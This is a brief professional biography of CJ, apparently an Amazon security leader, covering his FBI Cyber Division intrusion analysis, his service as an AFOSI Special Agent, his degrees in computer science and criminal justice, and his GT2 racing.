Prior to joining Amazon, CJ led the technical analysis of computer and network intrusion efforts at the Federal Bureau of Investigation’s Cyber Division. CJ also served as a Special Agent with the Air Force Office of Special Investigations (AFOSI). CJ led several computer intrusion investigations seen as foundational to the security industry today.

CJ holds degrees in Computer Science and Criminal Justice, and is an active SRO GT America GT2 race car driver.

❌